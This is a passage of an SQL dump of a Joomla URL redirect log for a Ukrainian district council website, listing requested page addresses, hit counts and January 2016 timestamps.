00:00:00',301),(24232,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/368-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_7?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:22:08','0000-00-00 00:00:00',301),(24233,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/374-pro-vtratu-chinnosti-rishennja-rajonnoi-radi-5','','','',7,0,'2016-01-05 00:22:10','0000-00-00 00:00:00',301),(24234,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/375-pro-pogodzhennja-priznachennja-na-posadu-direktora','','','',7,0,'2016-01-05 00:22:12','0000-00-00 00:00:00',301),(24235,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/375-pro-pogodzhennja-priznachennja-na-posadu-direktora?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:22:15','0000-00-00 00:00:00',301),(24236,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/382-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_4','','','',6,0,'2016-01-05 00:22:17','0000-00-00 00:00:00',301),(24237,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/744-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_25','','','',6,0,'2016-01-05 00:22:26','0000-00-00 00:00:00',301),(24238,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/744-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_25?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:22:28','0000-00-00 00:00:00',301),(24239,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/749-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_19','','','',6,0,'2016-01-05 00:22:30','0000-00-00 00:00:00',301),(24240,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/762-pro-peredachu-avtomobilja-gaz-3110','','','',7,0,'2016-01-05 00:22:31','0000-00-00 00:00:00',301),(24241,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/762-pro-peredachu-avtomobilja-gaz-3110?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:22:33','0000-00-00 00:00:00',301),(24242,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15042014-/767-pro-zatverdzhennja-tehnichnoi-dokumentacii-po_6?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:22:35','0000-00-00 00:00:00',301),(24243,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/815-pro-zatverdzhennja-rozmiru-groshovoi-kompensacii?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:22:41','0000-00-00 00:00:00',301),(24244,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/597-pro-hid-vikonannja-rajonnoi-cilovoi-programi_4','','','',5,0,'2016-01-05 00:23:05','0000-00-00 00:00:00',301),(24245,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/599-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_11?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:23:06','0000-00-00 00:00:00',301),(24246,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/600-pro-zatverdzhennja-rajonnoi-cilovoi-socialnoi_2','','','',5,0,'2016-01-05 00:23:08','0000-00-00 00:00:00',301),(24247,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/279-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_7','','','',6,0,'2016-01-05 00:23:12','0000-00-00 00:00:00',301),(24248,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/279-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_7?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:23:14','0000-00-00 00:00:00',301),(24249,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/784-pro-vnesennja-zmin-do-programi-vidpochinku-ta_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:23:16','0000-00-00 00:00:00',301),(24250,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/474-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_5?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:23:18','0000-00-00 00:00:00',301),(24251,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/260-pro-spisannja-osnovnih-zasobiv_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:23:20','0000-00-00 00:00:00',301),(24252,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/261-pro-vnesennja-zmin-do-rishen-rajonnoi-radi-vid-19','','','',5,0,'2016-01-05 00:23:22','0000-00-00 00:00:00',301),(24253,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/261-pro-vnesennja-zmin-do-rishen-rajonnoi-radi-vid-19?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:23:24','0000-00-00 00:00:00',301),(24254,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/262-pro-rozgljad-protestu-prokurora-malinskogo-rajonu_2','','','',6,0,'2016-01-05 00:23:26','0000-00-00 00:00:00',301),(24255,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/262-pro-rozgljad-protestu-prokurora-malinskogo-rajonu_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:23:28','0000-00-00 00:00:00',301),(24256,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/263-pro-zatverdzhennja-dogovoru-pro-nadannja-subvencii?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:23:30','0000-00-00 00:00:00',301),(24257,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/267-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_10?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:23:32','0000-00-00 00:00:00',301),(24258,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/268-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-05 00:23:34','0000-00-00 00:00:00',301),(24259,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=581:2012-02-27-13-13-19&catid=40:--28032012-&Itemid=77&lang=en','','','',5,0,'2016-01-05 00:48:22','0000-00-00 00:00:00',301),(24260,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=669:-2011-56-&catid=11&lang=uk','','','',6,0,'2016-01-05 00:48:24','0000-00-00 00:00:00',301),(24261,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=680:2012-05-17-10-02-41&catid=42:--16052012-&Itemid=80&lang=ru','','','',4,0,'2016-01-05 00:48:26','0000-00-00 00:00:00',301),(24262,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=682:-2012-&catid=42:--16052012-&Itemid=80&lang=en','','','',4,0,'2016-01-05 00:48:29','0000-00-00 00:00:00',301),(24263,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=682:-2012-&catid=42:--16052012-&Itemid=80&lang=ru','','','',4,0,'2016-01-05 00:48:32','0000-00-00 00:00:00',301),(24264,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=692:-2012&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2016-01-05 00:48:34','0000-00-00 00:00:00',301),(24265,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=696:-14-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2016-01-05 00:48:37','0000-00-00 00:00:00',301),(24266,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=696:-14-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2016-01-05 00:48:39','0000-00-00 00:00:00',301),(24267,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=724:-27042012252&catid=43:--25072012-&Itemid=82&lang=en','','','',5,0,'2016-01-05 00:48:47','0000-00-00 00:00:00',301),(24268,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=728:2012-06-26-07-51-10&catid=43:--25072012-&Itemid=82&lang=ru','','','',3,0,'2016-01-05 00:48:49','0000-00-00 00:00:00',301),(24269,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=733:-10-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2016-01-05 00:49:11','0000-00-00 00:00:00',301),(24270,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2016-01-05 00:49:31','0000-00-00 00:00:00',301),(24271,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=737:2012-07-18-13-36-46&catid=43:--25072012-&Itemid=82&lang=en','','','',3,0,'2016-01-05 00:49:36','0000-00-00 00:00:00',301),(24272,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=737:2012-07-18-13-36-46&catid=43:--25072012-&Itemid=82&lang=ru','','','',4,0,'2016-01-05 00:49:38','0000-00-00 00:00:00',301),(24273,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=747:2012-08-03-09-21-28&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2016-01-05 00:50:12','0000-00-00 00:00:00',301),(24274,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=759:2012-09-14-08-35-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2016-01-05 00:50:14','0000-00-00 00:00:00',301),(24275,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2016-01-05 00:50:16','0000-00-00 00:00:00',301),(24276,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=760:-qq-24-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2016-01-05 00:50:17','0000-00-00 00:00:00',301),(24277,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=762:-210-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2016-01-05 00:50:38','0000-00-00 00:00:00',301),(24278,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=766:2012-09-28-08-37-31&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2016-01-05 00:50:40','0000-00-00 00:00:00',301),(24279,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=805:2012-10-30-13-35-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2016-01-05 00:51:03','0000-00-00 00:00:00',301),(24280,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=808:2012-10-30-13-56-37&catid=11&lang=en','','','',6,0,'2016-01-05 00:51:05','0000-00-00 00:00:00',301),(24281,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=815:-16-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2016-01-05 00:51:07','0000-00-00 00:00:00',301),(24282,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=827:2012-11-20-17-44-21&catid=11&lang=en','','','',6,0,'2016-01-05 00:51:11','0000-00-00 00:00:00',301),(24283,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2016-01-05 00:51:13','0000-00-00 00:00:00',301),(24284,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=660:-12-6-&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=14&lang=ru','','','',1,0,'2016-01-05 01:42:14','0000-00-00 00:00:00',301),(24285,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1107:c-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-05 02:00:10','0000-00-00 00:00:00',301),(24286,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=693:2012-06-06-14-15-01&catid=11&Itemid=14&lang=en','','','',2,0,'2016-01-05 05:09:28','0000-00-00 00:00:00',301),(24287,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=47&Itemid=86&lang=en&limitstart=15','','','',3,0,'2016-01-05 05:48:04','0000-00-00 00:00:00',301),(24288,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/05122012-11-129','','','',3,0,'2016-01-05 06:14:48','0000-00-00 00:00:00',301),(24289,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0853-6-99','','','',3,0,'2016-01-05 06:14:58','0000-00-00 00:00:00',301),(24290,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/malinshchina-ta-malinchani?page=3','','','',15,0,'2016-01-05 06:15:17','0000-00-00 00:00:00',301),(24291,'http://www.malyn-rayrada.org.ua/Creaza-cont-nou.html','','','',3,0,'2016-01-05 07:10:16','0000-00-00 00:00:00',301),(24292,'http://www.malyn-rayrada.org.ua/create-an-account','','','',1,0,'2016-01-05 09:27:57','0000-00-00 00:00:00',301),(24293,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=594:-lr-&catid=40&Itemid=77&lang=ru','','','',2,0,'2016-01-05 10:47:25','0000-00-00 00:00:00',301),(24294,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',6,0,'2016-01-05 12:52:25','0000-00-00 00:00:00',301),(24295,'http://www.malyn-rayrada.org.ua/index.php?option=com_easyblog&view=entry&id=1&Itemid=1','','','',2,0,'2016-01-05 12:52:39','0000-00-00 00:00:00',301),(24296,'http://www.malyn-rayrada.org.ua/index.php?option=com_easyblog&view=entry&id=','','','',1,0,'2016-01-05 12:52:40','0000-00-00 00:00:00',301),(24297,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=786:-5-18112009-429-l-r&catid=45&Itemid=84&lang=ru','','','',4,0,'2016-01-05 12:55:28','0000-00-00 00:00:00',301),(24298,'http://www.malyn-rayrada.org.ua/component/user/register.html','','','',1,0,'2016-01-05 13:17:43','0000-00-00 00:00:00',301),(24299,'http://www.malyn-rayrada.org.ua/register','','','',2,0,'2016-01-05 13:17:44','0000-00-00 00:00:00',301),(24300,'http://www.malyn-rayrada.org.ua/auth/?register=yes&backurl=/index.php','','','',1,0,'2016-01-05 13:17:52','0000-00-00 00:00:00',301),(24301,'http://www.malyn-rayrada.org.ua/news/index.php?option=com_user&view=register','','','',1,0,'2016-01-05 13:46:05','0000-00-00 00:00:00',301),(24302,'http://www.malyn-rayrada.org.ua/social-network/my-network/registration.html','','','',1,0,'2016-01-05 13:47:16','0000-00-00 00:00:00',301),(24303,'http://www.malyn-rayrada.org.ua/images/stories/3xp.php','','','',1,0,'2016-01-05 14:51:06','0000-00-00 00:00:00',301),(24304,'http://www.malyn-rayrada.org.ua/component/easysocial/COM_EASYSOCIAL_ROUTER_LOGIN.html?Itemid=','','','',1,0,'2016-01-05 14:51:54','0000-00-00 00:00:00',301),(24305,'http://www.malyn-rayrada.org.ua/sinoptik.ua/informers_js.php?title=3&wind=1&cities=303015024&lang=ua','','','',1,0,'2016-01-05 14:55:51','0000-00-00 00:00:00',301),(24306,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=784:-9-&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-05 16:10:33','0000-00-00 00:00:00',301),(24307,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=247:---500------lr&catid=11&lang=uk','','','',4,0,'2016-01-05 16:37:09','0000-00-00 00:00:00',301),(24308,'http://www.malyn-rayrada.org.ua/sign-up','','','',1,0,'2016-01-05 17:37:45','0000-00-00 00:00:00',301),(24309,'http://malyn-rayrada.org.ua/index.php/650-pro-sklikannja-25-pozachergovoi-sesii-rajonnoi','','','',3,0,'2016-01-05 23:19:48','0000-00-00 00:00:00',301),(24310,'http://malyn-rayrada.org.ua/index.php/728-ogoloshennja_13?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-05 23:21:00','0000-00-00 00:00:00',301),(24311,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-1-11','','','',7,0,'2016-01-06 01:47:47','0000-00-00 00:00:00',301),(24312,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1110-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-06 01:48:15','0000-00-00 00:00:00',301),(24314,'http://www.malyn-rayrada.org.ua/index.php?catid=57&id=1276:2014-04-10-13-26-15&Itemid=98&lang=en&option=com_content&view=article','','','',1,0,'2016-01-06 03:50:22','0000-00-00 00:00:00',301),(24316,'http://malyn-rayrada.org.ua/index.php/component/content/article','','','',8,0,'2016-01-06 04:47:59','0000-00-00 00:00:00',301),(24317,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/60-deputatska-storinka/2010-06-05-12-52-17?lang=en','','','',7,0,'2016-01-06 04:48:15','0000-00-00 00:00:00',301),(24318,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58/60-deputatska-storinka/2010-06-05-12-52-17?lang=uk','','','',4,0,'2016-01-06 04:48:18','0000-00-00 00:00:00',301),(24323,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1259:1&Itemid=17&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-06 05:25:46','0000-00-00 00:00:00',301),(24324,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/703-pro-rajonnij-bjudzhet-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-06 05:43:05','0000-00-00 00:00:00',301),(24325,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/703-pro-rajonnij-bjudzhet-na-2014-rik','','','',4,0,'2016-01-06 05:43:05','0000-00-00 00:00:00',301),(24326,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/702-pro-suspilno-politichnu-situaciju-v-ukraini','','','',4,0,'2016-01-06 05:43:05','0000-00-00 00:00:00',301),(24327,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/913-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji','','','',1,0,'2016-01-06 05:43:08','0000-00-00 00:00:00',301),(24328,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/911-pro-zatverdzhennya-novogo-skladu-komisiji-rajonnoji-radi-z-pitan-ponovlennya-prav-reabilitovanikh','','','',1,0,'2016-01-06 05:43:26','0000-00-00 00:00:00',301),(24329,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo?page=2','','','',5,0,'2016-01-06 05:43:27','0000-00-00 00:00:00',301),(24330,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1284-pro-pilgovij-projizd-uchniv-ta-pedagogichnikh-pratsivnikiv-zakladiv-osviti-malinskogo-rajonu-na-2016-rik','','','',5,0,'2016-01-06 05:43:29','0000-00-00 00:00:00',301),(24331,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1254-pro-vnesennya-zmin-do-polozhennya-pro-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu','','','',6,0,'2016-01-06 05:44:03','0000-00-00 00:00:00',301),(24332,'http://malyn-rayrada.org.ua/index.php/251-vitaemo-iz-svjatom?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-06 05:44:06','0000-00-00 00:00:00',301),(24333,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1279:2014-04-13-11-36-46&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-06 05:44:09','0000-00-00 00:00:00',301),(24334,'http://malyn-rayrada.org.ua/index.php/1220-ogoloshennya-pro-provedennya-konkursu-na-pravo-orendi-majna-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-06 05:44:50','0000-00-00 00:00:00',301),(24335,'http://malyn-rayrada.org.ua/index.php/471-upravlinnja-statistiki-u-m-malini-informue_2?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-01-06 05:44:52','0000-00-00 00:00:00',301),(24337,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1256:2014-03-27-17-22-43&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-06 06:54:06','0000-00-00 00:00:00',301),(24338,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1283:2014-04-15-16-30-00&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-06 06:54:25','0000-00-00 00:00:00',301),(24339,'http://www.malyn-rayrada.org.ua/index.php?catid=57&id=1274:-l-r&Itemid=98&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-06 06:54:47','0000-00-00 00:00:00',301),(24340,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=699:-2011-2015-&Itemid=82&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-06 07:43:56','0000-00-00 00:00:00',301),(24341,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1274:----------------l--r&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-06 07:45:35','0000-00-00 00:00:00',301),(24342,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?catid=58&id=1309:-2014-&lang=uk','','','',4,0,'2016-01-06 07:55:36','0000-00-00 00:00:00',301),(24343,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/960-pro-zatverdzhennya-rajonnoji-programi-zabezpechennya-vikonannya-malinskoyu-rajonnoyu-derzhavnoyu-administratsieyu-delegovanikh-povnovazhen-na-2015-2017-roki','','https://www.google.com.ua/','',2,0,'2016-01-06 08:01:31','0000-00-00 00:00:00',301),(24344,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=706:---------qq--2012-2015-&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-06 08:04:34','0000-00-00 00:00:00',301),(24345,'http://www.malyn-rayrada.org.ua/index.php?catid=57:--15042014-&id=1268:-l-r&Itemid=98&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-06 08:04:57','0000-00-00 00:00:00',301),(24346,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1147:2013-11-28-09-57-12&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-06 08:05:13','0000-00-00 00:00:00',301),(24347,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1254:-1-50&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-06 08:08:05','0000-00-00 00:00:00',301),(24348,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1254:-1-50&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-06 08:19:40','0000-00-00 00:00:00',301),(24350,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=1299:-lr-&catid=58:--30042014-&lang=ru','','','',2,0,'2016-01-06 08:25:52','0000-00-00 00:00:00',301),(24351,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1257:2014-03-29-18-03-31&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-01-06 08:27:45','0000-00-00 00:00:00',301),(24352,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1208:2014-01-31-13-48-49&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-06 08:28:05','0000-00-00 00:00:00',301),(24353,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1259:1&Itemid=17&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-06 08:53:54','0000-00-00 00:00:00',301),(24354,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1267:2014-04-03-21-52-50&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-06 09:01:05','0000-00-00 00:00:00',301),(24355,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1285:2014-04-17-16-55-05&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-06 09:19:57','0000-00-00 00:00:00',301),(24356,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1276:2014-04-10-13-26-15&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-06 09:43:01','0000-00-00 00:00:00',301),(24357,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=804:2012-10-28-18-37-40&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-06 10:09:22','0000-00-00 00:00:00',301),(24358,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1105:2013-10-11-16-43-25&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2016-01-06 10:11:35','0000-00-00 00:00:00',301),(24359,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=505:2011-12-16-13-24-32&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2016-01-06 10:26:21','0000-00-00 00:00:00',301),(24360,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1121:--24--6-&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2016-01-06 11:06:55','0000-00-00 00:00:00',301),(24361,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1254:-1-50&lang=en&option=com_content&view=article','','','',1,0,'2016-01-06 11:38:44','0000-00-00 00:00:00',301),(24362,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1283:2014-04-15-16-30-00&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-06 11:52:39','0000-00-00 00:00:00',301),(24363,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1267:2014-04-03-21-52-50&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-06 12:42:58','0000-00-00 00:00:00',301),(24364,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-06 13:09:56','0000-00-00 00:00:00',301),(24365,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1255:2014-03-27-06-02-11&Itemid=17&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-06 13:21:14','0000-00-00 00:00:00',301),(24366,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1267:2014-04-03-21-52-50&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-06 13:30:24','0000-00-00 00:00:00',301),(24368,'http://www.malyn-rayrada.org.ua/index.php?catid=46&id=850:-2013-&Itemid=85&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-06 13:49:03','0000-00-00 00:00:00',301),(24369,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=320:-2010-2014-&Itemid=66&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-06 13:52:43','0000-00-00 00:00:00',301),(24370,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1285:2014-04-17-16-55-05&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-06 14:08:24','0000-00-00 00:00:00',301),(24371,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1255:2014-03-27-06-02-11&Itemid=17&lang=en&option=com_content&view=article','','','',2,0,'2016-01-06 14:23:21','0000-00-00 00:00:00',301),(24372,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1286:2014-04-23-06-48-27&Itemid=17&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-06 14:26:33','0000-00-00 00:00:00',301),(24373,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1277:-2014-&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-06 14:29:40','0000-00-00 00:00:00',301),(24374,'http://www.malyn-rayrada.org.ua/index.php?id=56:--03022014-&Itemid=97&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-01-06 14:30:11','0000-00-00 00:00:00',301),(24375,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1153:-2013-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2016-01-06 14:30:13','0000-00-00 